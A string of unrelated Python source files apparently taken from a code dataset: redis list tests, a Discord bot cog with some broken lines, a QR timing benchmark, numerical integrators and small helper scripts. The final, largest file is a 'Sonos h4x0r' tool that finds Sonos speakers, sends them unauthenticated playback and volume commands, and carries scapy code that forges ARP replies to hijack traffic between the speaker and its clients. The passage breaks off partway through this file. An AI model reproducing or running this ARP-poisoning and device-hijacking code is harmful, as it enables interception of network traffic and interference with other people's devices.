eq_(1, self.redis.llen(LIST1))
eq_(2, self.redis.llen(LIST2))
transfer_item = self.redis.rpoplpush(LIST1, LIST2)
eq_(b'', transfer_item)
eq_(0, self.redis.llen(LIST1))
eq_(3, self.redis.llen(LIST2))
eq_([], self.redis.lrange(LIST1, 0, -1))
# empty string is added to the destination queue
eq_([b'', bVAL3, bVAL4], self.redis.lrange(LIST2, 0, -1))
def test_lrange_get_all(self):
"""Cases for returning entire list"""
values = [bVAL4, bVAL3, bVAL2, bVAL1]
eq_([], self.redis.lrange(LIST1, 0, 6))
eq_([], self.redis.lrange(LIST1, 0, -1))
self.redis.lpush(LIST1, *reversed(values))
# Check with exact range
eq_(values, self.redis.lrange(LIST1, 0, 3))
# Check with negative index
eq_(values, self.redis.lrange(LIST1, 0, -1))
# Check with range larger than length of list
eq_(values, self.redis.lrange(LIST1, 0, 6))
def test_lrange_get_sublist(self):
"""Cases for returning partial list"""
values = [bVAL4, bVAL3, bVAL2, bVAL1]
eq_([], self.redis.lrange(LIST1, 0, 6))
eq_([], self.redis.lrange(LIST1, 0, -1))
self.redis.lpush(LIST1, *reversed(values))
# Check from left end of the list
eq_(values[:2], self.redis.lrange(LIST1, 0, 1))
# Check from right end of the list
eq_(values[2:4], self.redis.lrange(LIST1, 2, 3))
# Check from right end of the list with negative range
eq_(values[-2:], self.redis.lrange(LIST1, -2, -1))
# Check from middle of the list
eq_(values[1:3], self.redis.lrange(LIST1, 1, 2))
def test_ltrim_retain_all(self):
values = [bVAL4, bVAL3, bVAL2, bVAL1]
self._reinitialize_list(LIST1, *values)
self.redis.ltrim(LIST1, 0, -1)
eq_(values, self.redis.lrange(LIST1, 0, -1))
self.redis.ltrim(LIST1, 0, len(values) - 1)
eq_(values, self.redis.lrange(LIST1, 0, -1))
self.redis.ltrim(LIST1, 0, len(values) + 1)
eq_(values, self.redis.lrange(LIST1, 0, -1))
self.redis.ltrim(LIST1, -1 * len(values), -1)
eq_(values, self.redis.lrange(LIST1, 0, -1))
self.redis.ltrim(LIST1, -1 * (len(values) + 1), -1)
eq_(values, self.redis.lrange(LIST1, 0, -1))
def test_ltrim_remove_all(self):
values = [bVAL4, bVAL3, bVAL2, bVAL1]
self._reinitialize_list(LIST1, *values)
self.redis.ltrim(LIST1, 2, 1)
eq_([], self.redis.lrange(LIST1, 0, -1))
self._reinitialize_list(LIST1, *values)
self.redis.ltrim(LIST1, -1, -2)
eq_([], self.redis.lrange(LIST1, 0, -1))
self._reinitialize_list(LIST1, *values)
self.redis.ltrim(LIST1, 2, -3)
eq_([], self.redis.lrange(LIST1, 0, -1))
self._reinitialize_list(LIST1, *values)
self.redis.ltrim(LIST1, -1, 2)
eq_([], self.redis.lrange(LIST1, 0, -1))
def test_ltrim(self):
values = [bVAL4, bVAL3, bVAL2, bVAL1]
self._reinitialize_list(LIST1, *values)
self.redis.ltrim(LIST1, 1, 2)
eq_(values[1:3], self.redis.lrange(LIST1, 0, -1))
self._reinitialize_list(LIST1, *values)
self.redis.ltrim(LIST1, -3, -1)
eq_(values[-3:], self.redis.lrange(LIST1, 0, -1))
self._reinitialize_list(LIST1, *values)
self.redis.ltrim(LIST1, 1, 5)
eq_(values[1:5], self.redis.lrange(LIST1, 0, -1))
self._reinitialize_list(LIST1, *values)
self.redis.ltrim(LIST1, -100, 2)
eq_(values[-100:3], self.redis.lrange(LIST1, 0, -1))
def test_sort(self):
values = [b'0.1', b'2', b'1.3']
self._reinitialize_list(LIST1, *values)
# test unsorted
eq_(self.redis.sort(LIST1, by='nosort'), values)
# test straightforward sort
eq_(self.redis.sort(LIST1), [b'0.1', b'1.3', b'2'])
# test alpha vs numeric sort
values = [-1, -2]
self._reinitialize_list(LIST1, *values)
eq_(self.redis.sort(LIST1, alpha=True), [b'-1', b'-2'])
eq_(self.redis.sort(LIST1, alpha=False), [b'-2', b'-1'])
values = ['0.1', '2', '1.3']
self._reinitialize_list(LIST1, *values)
# test returning values sorted by values of other keys
self.redis.set('by_0.1', '3')
self.redis.set('by_2', '2')
self.redis.set('by_1.3', '1')
eq_(self.redis.sort(LIST1, by='by_*'), [b'1.3', b'2', b'0.1'])
# test returning values from other keys sorted by list
self.redis.set('get1_0.1', 'a')
self.redis.set('get1_2', 'b')
self.redis.set('get1_1.3', 'c')
eq_(self.redis.sort(LIST1, get='get1_*'), [b'a', b'c', b'b'])
# test storing result
eq_(self.redis.sort(LIST1, get='get1_*', store='result'), 3)
eq_(self.redis.llen('result'), 3)
eq_(self.redis.lrange('result', 0, -1), [b'a', b'c', b'b'])
# test desc (reverse order)
eq_(self.redis.sort(LIST1, get='get1_*', desc=True), [b'b', b'c', b'a'])
# test multiple gets without grouping
self.redis.set('get2_0.1', 'x')
self.redis.set('get2_2', 'y')
self.redis.set('get2_1.3', 'z')
eq_(self.redis.sort(LIST1, get=['get1_*', 'get2_*']), [b'a', b'x', b'c', b'z', b'b', b'y'])
# test start and num apply to sorted items not final flat list of values
eq_(self.redis.sort(LIST1, get=['get1_*', 'get2_*'], start=1, num=1), [b'c', b'z'])
# test multiple gets with grouping
eq_(self.redis.sort(LIST1, get=['get1_*', 'get2_*'], groups=True), [(b'a', b'x'), (b'c', b'z'), (b'b', b'y')]) # noqa
# test start and num
eq_(self.redis.sort(LIST1, get=['get1_*', 'get2_*'], groups=True, start=1, num=1), [(b'c', b'z')]) # noqa
eq_(self.redis.sort(LIST1, get=['get1_*', 'get2_*'], groups=True, start=1, num=2), [(b'c', b'z'), (b'b', b'y')]) # noqa
def test_lset(self):
with assert_raises(Exception):
self.redis.lset(LIST1, 1, VAL1)
self.redis.lpush(LIST1, VAL2)
eq_([bVAL2], self.redis.lrange(LIST1, 0, -1))
with assert_raises(Exception):
self.redis.lset(LIST1, 1, VAL1)
self.redis.lset(LIST1, 0, VAL1)
eq_([bVAL1], self.redis.lrange(LIST1, 0, -1))
def test_push_pop_returns_str(self):
key = 'l'
values = ['5', 5, [], {}]
for v in values:
self.redis.rpush(key, v)
eq_(self.redis.lpop(key), str(v).encode('utf8'))
def _reinitialize_list(self, key, *values):
"""
Re-initialize the list
"""
self.redis.delete(LIST1)
self.redis.lpush(LIST1, *reversed(values))
| StarcoderdataPython |
11287108 | <reponame>Cryptex-github/publicbot<gh_stars>0
import discord
from discord.ext import commands
# Image Manipulation
import cv2 as cv
from urllib.request import Request, urlopen
import numpy as np
class Misc(commands.Cog):
"""Some miscellaneous commands"""
def __init__(self, bot):
self.bot = bot
def url_to_image(self,url, readFlag=cv.IMREAD_COLOR):
# download the image, convert it to a NumPy array, and read the numpy array
req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})
resp = urlopen(req).read()
image = np.asarray(bytearray(resp), dtype="uint8")
image = cv.imdecode(image, readFlag)
# return the image
return image
@commands.command()
@commands.guild_only() # Can't be used in DMs
async def memberinfo(self, ctx, member: discord.Member = None):
"""Get info about a member"""
async with ctx.typing():
member = member or ctx.author()
show_roles = ', '.join(
[f"<@&{x.id}>" for x in sorted(user.roles, key = lambda x: x.position, reverse=True) if x.id != ctx.guild.default_role.id]
) if len(user.roles) > 1 else 'None'
embed = discord.Embed(colour = member.top_role.colour.value)
embed.set_author(name = str(member))
embed.add_field(name = "Nickname", value = member.nick if hasattr(member, "nick") else "None", inline = True)
embed.add_field(name = "Account created", value = member.created_at.strftime("**%d/%m/%Y** at **%H:%M**"), inline = True)
embed.add_field(name = "Joined this server", value = member.joined_at.strftime("**%d/%m/%Y** at **%H:%M**"), inline = True)
embed.add_field(name = "Roles", value = show_roles, inline = False)
embed.set_thumbnail(url = member.avatar_url)
embed.set_footer(text = f"ID: {member.id}")
await ctx.send(embed = embed)
@command.command()
@commands.guild_only()
async def serverinfo(self, ctx):
"""Shows info about the server"""
guild = ctx.guild
guild_created_on = guild.created_at.strftime("%d/%m/%Y")
embed = discord.Embed(title = guild.name, description = f"Created on {guild_created_on}", colour = discord.Colour.random())
embed.add_field(name = "Members", value = len(guild.members), inline = True)
embed.add_field(name = "Roles", value = str(len(guild.roles)), inline = True)
embed.add_field(name = "Channels", value = (f"Text channels: {len(guild.text_channels)}\nVoice channels: {len(guild.voice_channels)}"), inline = True)
embed.add_field(name = "Owner", value = guild.owner.name + "#" + guild.owner.discriminator, inline = True)
embed.add_field(name = "Voice region", value = guild.region, inline = True)
embed.add_field(name = "Nitro boosts", value = f"{guild.premium_subscription_count} (level {guild.premium_tier})", inline = True)
embed.set_thumbnail(url = guild.icon_url if len(guild.icon_url) else ctx.author.default_avatar_url)
embed.set_footer(text = f"ID: {guild.id}")
await ctx.send(embed=embed)
@commands.command()
@commands.guild_only()
async def avatar(self, ctx, member: discord.Member = None):
"""Get a member's avatar"""
member = member or ctx.author
embed = discord.Embed(title = f"Avatar for {member.name}", description = f"[Link]({member.avatar_url})", colour = member.top_role.colour.value)
embed.set_image(url = member.avatar_url)
await ctx.send(embed = embed)
@commands.command()
@commands.guild_only()
async def dm(self, ctx, member: discord.Member, *, message: str):
"""Make the bot send a message to the specified member"""
try:
await member.send(message)
except discord.Forbidden:
await ctx.send("This user might be having their DMs closed, or it's a bot.")
await ctx.message.add_reaction("\U0000274c")
@commands.command()
async def canny(self,ctx, member: discord.Member = None):
if member is None:
member = ctx.message.author
else:
member = member
img = self.url_to_image(member.avatar_url)
canny = cv.Canny(img, 125, 175)
cv.imwrite("new_image.jpg", canny)
file=discord.File('new_image.jpg')
await ctx.send(file=file)
def setup(bot):
bot.add_cog(Misc(bot))
| StarcoderdataPython |
12806794 | <reponame>UTexas-PSAAP/Parla.py
import os
os.environ["OMP_NUM_THREADS"] = "24" # This is the default on my machine (Zemaitis)
import argparse
import numpy as np
import scipy.linalg
from time import perf_counter as time
def check_result(A, Q, R):
# Check product
is_correct_prod = np.allclose(np.matmul(Q, R), A)
# Check orthonormal
Q_check = np.matmul(Q.transpose(), Q)
is_ortho_Q = np.allclose(Q_check, np.identity(NCOLS))
# Check upper
is_upper_R = np.allclose(R, np.triu(R))
return is_correct_prod and is_ortho_Q and is_upper_R
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-r", "--rows", help="Number of rows for input matrix; must be >> cols", type=int, default=5000)
parser.add_argument("-c", "--cols", help="Number of columns for input matrix", type=int, default=100)
parser.add_argument("-i", "--iterations", help="Number of iterations to run experiment.", type=int, default=1)
parser.add_argument("-w", "--warmup", help="Number of warmup runs to perform before iterations.", type=int, default=0)
parser.add_argument("-K", "--check_result", help="Checks final result on CPU", action="store_true")
args = parser.parse_args()
# Set global config variables
NROWS = args.rows
NCOLS = args.cols
ITERS = args.iterations
WARMUP = args.warmup
CHECK_RESULT = args.check_result
print('%**********************************************************************************************%\n')
print('Config: rows=', NROWS, ' cols=', NCOLS, ' iterations=', ITERS, ' warmup=', WARMUP, ' check_result=', CHECK_RESULT, sep='', end='\n\n')
for i in range(WARMUP + ITERS):
# Original matrix
A = np.random.rand(NROWS, NCOLS)
start = time()
Q, R = scipy.linalg.qr(A, mode='economic')
end = time()
if (i >= WARMUP):
print(end - start)
if CHECK_RESULT:
if check_result(A, Q, R):
print("\nCorrect result!\n")
else:
print("%***** ERROR: Incorrect final result!!! *****%")
| StarcoderdataPython |
3440250 | """A Data Management, fitting and sequence design tool designed for Protein Engineering"""
| StarcoderdataPython |
11223650 | <reponame>vincentdavis/special-sequences
from unittest import TestCase
from seqs.CardinalityMatchingAlt2 import matching, greedy_matching
# g = {0: {1: (0, 1), 2: (0, 2), 4: (0, 4)}, 1: {0: (1, 0), 3: (1, 3), 5: (1, 5)}, 2: {3: (2, 3), 0: (2, 0), 6: (2, 6)}, 3: {2: (3, 2), 1: (3, 1), 7: (3, 7)}, 4: {5: (4, 5), 6: (4, 6), 0: (4, 0)}, 5: {4: (5, 4), 7: (5, 7), 1: (5, 1)}, 6: {7: (6, 7), 4: (6, 4), 2: (6, 2)}, 7: {6: (7, 6), 5: (7, 5), 3: (7, 3)}}
g = {
"A": ["B", "D", "I"],
"B": ["A", "I", "C", "D"],
"C": ["B",],
"D": ["E", "F", "G", "H", "I", "A", "B"],
"E": ["D",],
"F": ["G", "D"],
"G": ["D", "F"],
"H": ["D",],
"I": ["A", "B", "D",],
}
matching(g, initial_matching=None)
greedy_matching(g, initial_matching=None)
print("test")
| StarcoderdataPython |
345663 | # -*- coding: utf-8 -*-
"""
Flandre Gallery Module (/flandre)
Created on Sun Sep 1 15:36:31 2019
@author: eliphat
"""
import os
import random
import tg_connection
flanpic_dir = r"D:\AndroidProjects\ScarletKindom\image-downloader\images0825"
oss_root = 'https://scarletkindom.oss-cn-hangzhou.aliyuncs.com'
oss_fmt = oss_root + '/flandre_collection/%s/botproc'
flanpics = []
for cur_root, dirs, files in os.walk(flanpic_dir):
for file in files:
flanpics.append(file)
def internal_local_getpic():
return os.path.join(flanpic_dir, random.choice(flanpics))
async def command_flandre(session, chat_id):
photo_url = oss_fmt % random.choice(flanpics)
await tg_connection.send_photo_by_url(session, chat_id, photo_url)
| StarcoderdataPython |
3527898 | <filename>npamp/model/integrator.py
# Copyright (C) 2012 <NAME>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import math
import numpy as np
import scipy.integrate
class NumericalIntegrator(object):
min_count = 2
method = None
def __call__(self, Y, dx):
return self.method(Y, dx=dx)
class TrapezoidIntegrator(NumericalIntegrator):
method = staticmethod(scipy.integrate.trapz)
class SimpsonIntegrator(NumericalIntegrator):
method = staticmethod(scipy.integrate.simps)
class RombergIntegrator(NumericalIntegrator):
min_count = 3
method = staticmethod(scipy.integrate.romb)
class DomainIntegrator(object):
def __init__(self, int_type):
self.num_integrator = int_type()
def integrate(self, X, Y):
assert X.ndim == Y.ndim == 1
assert X.shape == Y.shape
assert len(X) >= self.num_integrator.min_count
divs_f = math.log(len(X) - 1, 2.0)
divs = int(divs_f)
assert divs == divs_f
dx = (X[-1] - X[0]) / (len(X) - 1)
I = self.num_integrator(Y, dx)
return I
def integrate_base(self, active_medium, input_beam, Rho, Phi, fluence):
assert Rho.ndim == Phi.ndim == 1
assert fluence.shape == (Rho.shape + Phi.shape)
integrate = lambda Y, X, xmax: self.integrate(X, Y) if len(X) > 1 else xmax * Y[0]
radius = active_medium.radius
if input_beam is not None:
radius = min(radius, input_beam.rho_trunc)
phi_integrals = np.apply_along_axis(integrate, 1, fluence, Phi, 2.0*math.pi)
phi_integrals *= Rho if len(Rho) > 1 else radius/2.0
rho_phi_integral = integrate(phi_integrals, Rho, radius)
return rho_phi_integral
| StarcoderdataPython |
1769729 | #/!/usr/bin/python
def writeDataToFile(filename, data, quitOnFail=False):
f = file("output/"+filename, "a")
f.write(data)
f.flush()
f.close()
print "[*] Successfully saved %s" % filename
| StarcoderdataPython |
4887147 | <reponame>stephenwalker2020/solidity-things<gh_stars>0
#!/usr/bin/python3
from brownie import accounts, Contract, BoringDAOTimelock
from dotenv import load_dotenv
import os
load_dotenv()
def main():
user = accounts.add(os.getenv("private_key"))
print(user)
timelock = BoringDAOTimelock.deploy(24*3600, [user], [user], {'from': user})
print("timelock {}".format(timelock.address)) | StarcoderdataPython |
1791928 |
def print_event(args):
print "Event: ", args
def invoke(event_manager):
print event_manager
event_manager.register_handler('message', print_event, persist=True)
| StarcoderdataPython |
11270577 | <reponame>SpikingNeurons/toolcraft
from .__base__ import Folder, ResultsFolder, StorageHashable
from .state import Info, Config
from .file_group import FileGroup, NpyMemMap, SHUFFLE_SEED_TYPE, \
DETERMINISTIC_SHUFFLE, NO_SHUFFLE, DO_NOT_USE, USE_ALL, \
SELECT_TYPE, NON_DETERMINISTIC_SHUFFLE, FileGroupConfig
from .file_group import DownloadFileGroup, NpyFileGroup, TempFileGroup
from .store import StoreField, StoreFieldsFolder, Mode, MODE_TYPE, \
is_store_field
from .table import FILTERS_TYPE, FILTER_TYPE
# from .tf_chkpt import TfChkptFile, TfChkptFilesManager
| StarcoderdataPython |
9663639 | import argparse
import logging
import sys
import socket
from typing import ByteString
import select
import time
import re
from urllib import request
import scapy
import getmac
from getmac import get_mac_address
from scapy.all import *
def getArgs():
# Parse command-line arguments
argsParser = argparse.ArgumentParser(
description="Sonos h4x0r.\nEnables you to mess around " +
"with sonos devices on the local network.")
argsParser.add_argument(
"-v",
"--verbose",
required=False,
action="store_true",
help="show verbose output (useful for debugging purposes)"
)
subparser = argsParser.add_subparsers(
dest="command",
title="commands",
help="(use '{command} -h' to list command-specific arguments)")
subparser.required = True
# Define parser rules for different commands
discoveryParser = subparser.add_parser(
"discover",
help="discover sonos devices on the local network")
# For the control parser, we need an extra subparser that parses the action the user
# wants to perform. Also, list the 'ip' argument as required.
controlParser = subparser.add_parser(
"control",
help="control a sonos device on the network")
controlParser.add_argument_group("required arguments").add_argument(
"-ip",
"--address",
required=True,
action="store",
help="the address of the sonos device")
controlParser.add_argument(
"-arp",
"--interface",
required=False,
action="store",
help="after performing the command, perform arp poisoning on specified INTERFACE, obstructing the victim from controlling the device")
actionParser = controlParser.add_subparsers(dest="action", title="action")
actionParser.required = True
actionParser.add_parser("next", help="play next song")
actionParser.add_parser("previous", help="play previous song")
actionParser.add_parser("pause", help="pause music")
actionParser.add_parser("play", help="play music")
volumeParser = actionParser.add_parser("volume", help="control the volume")
volumeParser.add_argument_group("required argument").add_argument("level",
action="store",
type=int,
help="the volume level (0 - 99) to set")
return argsParser.parse_args()
# Initialize arguments
arguments = getArgs()
# Define a list in which we're appending the ip addresses of Sonos devices
# We end up wanting to hijack traffic from the sonos device to those clients.
# This is ONLY necessary when the user wants to perform arp poisoning.
clientList = []
# Initialize logging framework
# Set loglevel to DEBUG if verbose option is specified, otherwise INFO
# Just simply log to stdout with a simple formatter (that's sufficient - no fancy timestamps needed)
verbose = arguments.verbose
logLevel = logging.DEBUG if verbose else logging.INFO
logging.basicConfig(level=logLevel,
format="%(message)s",
handlers=[logging.StreamHandler(sys.stdout)])
logging.getLogger("scapy").setLevel(logging.CRITICAL)
class SonosDevice:
# Represents a sonos device
# Contains the device's IP, serverVersion, and the descriptionLocation
# at which additional information can be retrieved through
# an HTTP GET.
# TODO NIEK: Nice to have: retrieve that additional information and parse the xml to show some.
def __init__(self, ip, serverVersion, descriptionLocation):
self.ip = ip
self.serverVersion = serverVersion
self.descriptionLocation = descriptionLocation
def filterAndGetSonosDevices(dataAddrTupleList):
# Filters Sonos devices from the provided list of strings with udp packet data.
# Argument dataAddrTupleList represents a list of (data, addr) tuples.
# Returns a list of SonosDevice objects.
result = []
sonosRegex = re.compile(r"Sonos", re.MULTILINE)
locationRegex = re.compile(r"^LOCATION: (.*)\r$", re.MULTILINE)
serverVersionRegex = re.compile(r"^SERVER: (.*)\r$", re.MULTILINE)
# Loop over the list of (data, addr) tuples
for entry in dataAddrTupleList:
# entry[0] refers to the "data" part of the tuple
# Note that we still have to decode the (bytes) data
# Check whether the data contains 'Sonos' and both other regex' contain
# a match.
# If so, we assume it's a sonos device.
data = entry[0].decode('utf-8')
# entry[1] returns an (ip, port) tuple: throw away the port, we don't need it.
ip, _ = entry[1]
sonosMatchExists = bool(locationRegex.search(data))
locMatch = locationRegex.search(data)
serverVersionMatch = serverVersionRegex.search(data)
locMatchExists = bool(locMatch)
serverVersionExists = bool(serverVersionMatch)
if sonosMatchExists and locMatchExists and serverVersionExists:
# The found data was about a sonos device
sd = SonosDevice(ip, serverVersionMatch.group(1), locMatch.group(1))
result.append(sd)
# Else: do nothing - the data wasn't about a sonos device or we don't support it
# Done looping the provided list of tuples - we got all devices now.
return result
def discovery():
# Performs service discovery by sending a pre-formed
# UDP packet to the multicast broadcast IP address.
# This packet triggers service discovery by SSDP.
# Returns a list of SonosDevices found
multicast_addr = "192.168.127.12"
ssdp_port = 1900
# This packet contains the following data:
# M-SEARCH * HTTP/1.1
# HOST: 192.168.127.12:1900
# MAN: "ssdp:discover"
# MX: 1
# ST: urn:schemas-upnp-org:device:ZonePlayer:1
# USER-AGENT: Linux UPnP/1.0 Sonos/63.2-89270 (WDCR:Microsoft Windows
# NT 10.0.19042)
# X-SONOS-DEVICEID: 03c8b12a-8339-46da-bd08-f1a2b32d1475
# X-SONOS-SESSIONSECONDS: 11
# X-SONOS-MDPMODEL: 3
svcDiscTrigger = bytes.fromhex("4d2d534541524348202a20485454502f" +
"312e310d0a484f53543a203233392e32" +
"35352e3235352e3235303a313930300d" +
"0a4d414e3a2022737364703a64697363" +
"6f766572220d0a4d583a20310d0a5354" +
"3a2075726e3a736368656d61732d7570" +
"6e702d6f72673a6465766963653a5a6f" +
"6e65506c617965723a310d0a55534552" +
"2d4147454e543a204c696e7578205550" +
"6e502f312e3020536f6e6f732f36332e" +
"322d38393237302028574443523a4d69" +
"63726f736f66742057696e646f777320" +
"4e542031302e302e3139303432290d0a" +
"582d534f4e4f532d4445564943454944" +
"3a2030336338623132612d383333392d" +
"343664612d626430382d663161326233" +
"3264313437350d0a582d534f4e4f532d" +
"53455353494f4e5345434f4e44533a20" +
"31310d0a582d534f4e4f532d4d44504d" +
"4f44454c3a20330d0a0d0a")
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Use a random free port and bind to it.
# Then wait a couple tenths of milliseconds to allow the socket to be created;
# we don't want send out a multicast before we're actually listening to the
# socket as that'd mean we would miss some responses.
sock.bind(('', 0))
time.sleep(0.05)
logging.debug(f"Socket (UDP) listening on {sock.getsockname()}")
sent = sock.sendto(svcDiscTrigger, (multicast_addr, ssdp_port))
# Wait for device responses for 3 seconds
startTime = time.time()
responses = []
# While the current time is smaller than startTime + 3 seconds
# (i.e. as long as no more than 3 seconds since start have elapsed)
while (time.time() < startTime + 3):
# Block receive until
recvReady, _, _ = select.select([sock], [], [], 1) # Timeout after 1 second
# Fetch received messages
for s in recvReady:
# We got no clue how big the message will be, read max size.
data, addr = s.recvfrom(65535)
# Add the (data, addr) tuple to the responses
responses.append((data, addr))
logging.debug(f"Packet from {str(addr)}:\n {str(data.decode('utf-8'))}\n")
logging.debug(f"Found {str(len(responses))} devices responding to SSDP on network.")
# Now we've aggregated all responses, we should still filter out the sonos devices.
# There could be other kinds of devices responding to multicast packets.
devices = filterAndGetSonosDevices(responses)
logging.debug(f"Found {str(len(devices))} Sonos devices on network.")
return devices
def setVolume(ip, level):
# Sets the volume of the device at specified IP to the provided level.
headers = {
"SOAPACTION": "urn:schemas-upnp-org:service:RenderingControl:1#SetVolume",
"CONTENT-TYPE": "text/xml; charset=\"utf-8\""
}
method = "POST"
url = f"http://{ip}:1400/MediaRenderer/RenderingControl/Control"
data = ("<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">" +
"<s:Body><u:SetVolume xmlns:u=\"urn:schemas-upnp-org:service:RenderingControl:1\"><InstanceID>0</InstanceID>" +
f"<Channel>Master</Channel><DesiredVolume>{level}</DesiredVolume></u:SetVolume></s:Body></s:Envelope>").encode("utf-8")
req = request.Request(url=url, data=data, headers=headers, method=method)
logging.debug(f"Sending volume change request")
request.urlopen(req)
def playNext(ip):
# Play the next song
headers = {
"SOAPACTION": "urn:schemas-upnp-org:service:AVTransport:1#Next",
"CONTENT-TYPE": "text/xml; charset=\"utf-8\""
}
method = "POST"
url = f"http://{ip}:1400/MediaRenderer/AVTransport/Control"
data = ("<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">" +
"<s:Body><u:Next xmlns:u=\"urn:schemas-upnp-org:service:AVTransport:1\"><InstanceID>0</InstanceID></u:Next></s:Body></s:Envelope>").encode("utf-8")
req = request.Request(url=url, data=data, headers=headers, method=method)
logging.debug("Sending play next request")
request.urlopen(req)
def playPrevious(ip):
# Play the previous song
headers = {
"SOAPACTION": "urn:schemas-upnp-org:service:AVTransport:1#Previous",
"CONTENT-TYPE": "text/xml; charset=\"utf-8\""
}
method = "POST"
url = f"http://{ip}:1400/MediaRenderer/AVTransport/Control"
data = ("<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">" +
"<s:Body><u:Previous xmlns:u=\"urn:schemas-upnp-org:service:AVTransport:1\"><InstanceID>0</InstanceID></u:Previous></s:Body></s:Envelope>").encode("utf-8")
req = request.Request(url=url, data=data, headers=headers, method=method)
logging.debug("Sending play previous request")
request.urlopen(req)
def pauseMusic(ip):
# Pauzes the music on the device.
headers = {
"SOAPACTION": "urn:schemas-upnp-org:service:AVTransport:1#Pause",
"CONTENT-TYPE": "text/xml; charset=\"utf-8\""
}
method = "POST"
url = f"http://{ip}:1400/MediaRenderer/AVTransport/Control"
data = ("<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">" +
"<s:Body><u:Pause xmlns:u=\"urn:schemas-upnp-org:service:AVTransport:1\"><InstanceID>0</InstanceID></u:Pause></s:Body></s:Envelope>").encode("utf-8")
req = request.Request(url=url, data=data, headers=headers, method=method)
logging.debug("Sending pause request")
request.urlopen(req)
def playMusic(ip):
headers = {
"SOAPACTION": "urn:schemas-upnp-org:service:AVTransport:1#Play",
"CONTENT-TYPE": "text/xml; charset=\"utf-8\""
}
method = "POST"
url = f"http://{ip}:1400/MediaRenderer/AVTransport/Control"
data = ("<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:Play xmlns:" +
"u=\"urn:schemas-upnp-org:service:AVTransport:1\"><InstanceID>0</InstanceID><Speed>1</Speed></u:Play></s:Body></s:Envelope>").encode("utf-8")
req = request.Request(url=url, data=data, headers=headers, method=method)
logging.debug(f"Performing HTTP request to play music")
request.urlopen(req)
def createArpPacket(attackerMac, victimMac, victimIp, ipToSpoof):
# Forges an ARP packet to achieve redirection of traffic to the ipToSpoof
# to the attackerMac, addressed to the victim.
arp = Ether() / ARP()
arp[Ether].src = attackerMac
arp[ARP].hwsrc = attackerMac
arp[ARP].psrc = ipToSpoof
arp[ARP].hwdst = victimMac
arp[ARP].pdst = victimIp
return arp
def arpFilterAndPoison(packet):
# This method filters out interesting arp packets
# We consider an arp packet interesting when it is either tries to
# resolve the address of the sonos device, or when the sonos device
# tries to resolve the address of a client.
# We distinguish the clients by keeping track of who tries to resolve
# the sonos device's address. When a network device tries to resolve
# the sonos device's address, we assume it is a client of it.
# If the sniffed packet originated from ourself, return (skip).
if packet[Ether].src == macSelf:
return
# If the operation is "who-has", then:
if packet[ARP].op == 1:
# If someone asked for the Sonos device's IP, then:
# (Note that the second comparison is required to avoid that we list
# the sonos device as a client of itself when it does gratuitous ARP
# announcements)
if (packet[ARP].pdst == ipSonos) and (packet[ARP].psrc != ipSonos):
logging.debug(f"IP {packet[ARP].pdst} asked for Sonos device IP")
victimMac = packet[ARP].hwsrc
victimIp = packet[ARP].psrc
ipToSpoof = ipSonos
arpPacket = createArpPacket(macSelf, victimMac, victimIp, ipToSpoof)
# Append the victim's IP to the client list
# We've now identified the IP address of a sonos client, so we must make
# sure that when the sonos device tries to contact the client, we hijack
# that communication as well.
logging.debug(f"Add victimIP '{victimIp}' to client list")
clientList.append(victimIp)
# Send it a couple of times to make sure we win the race
sendp([arpPacket], loop=0)
sendp([arpPacket], loop=0)
sendp([arpPacket], loop=0)
# If the Sonos device asked for a client device's IP, then:
elif (packet[ARP].pdst in clientList) and (packet[ARP].psrc == ipSonos):
logging.debug(f"IP {packet[ARP].pdst} found in clientlist.")
victimMac = packet[ARP].hwsrc
victimIp = ipSonos
ipToSpoof = packet[ARP].pdst
arpPacket = createArpPacket(macSelf, victimMac, victimIp, ipToSpoof)
# Send it a couple of times to make sure we win the race
sendp([arpPacket], loop=0)
sendp([arpPacket], loop=0)
sendp([arpPacket], loop=0)
# If the discover flag was set, start discovery.
if arguments.command == "discover":
logging.debug("Starting discovery")
devices = discovery()
logging.info("Address \t\t Server version \t\t\t\t Location\n")
for dev in devices:
logging.info(f"{dev.ip} \t\t {dev.serverVersion} \t {dev.descriptionLocation}")
exit()
elif arguments.command == "control":
ip = arguments.address
if arguments.action == "volume":
# If the provided level is outside 0-99 range, snap it to closest (0 or 99)
level = max(min(99, arguments.level),0)
logging.debug(f"Changing volume to {level}")
setVolume(ip, level)
logging.info(f"Changed volume to {level}")
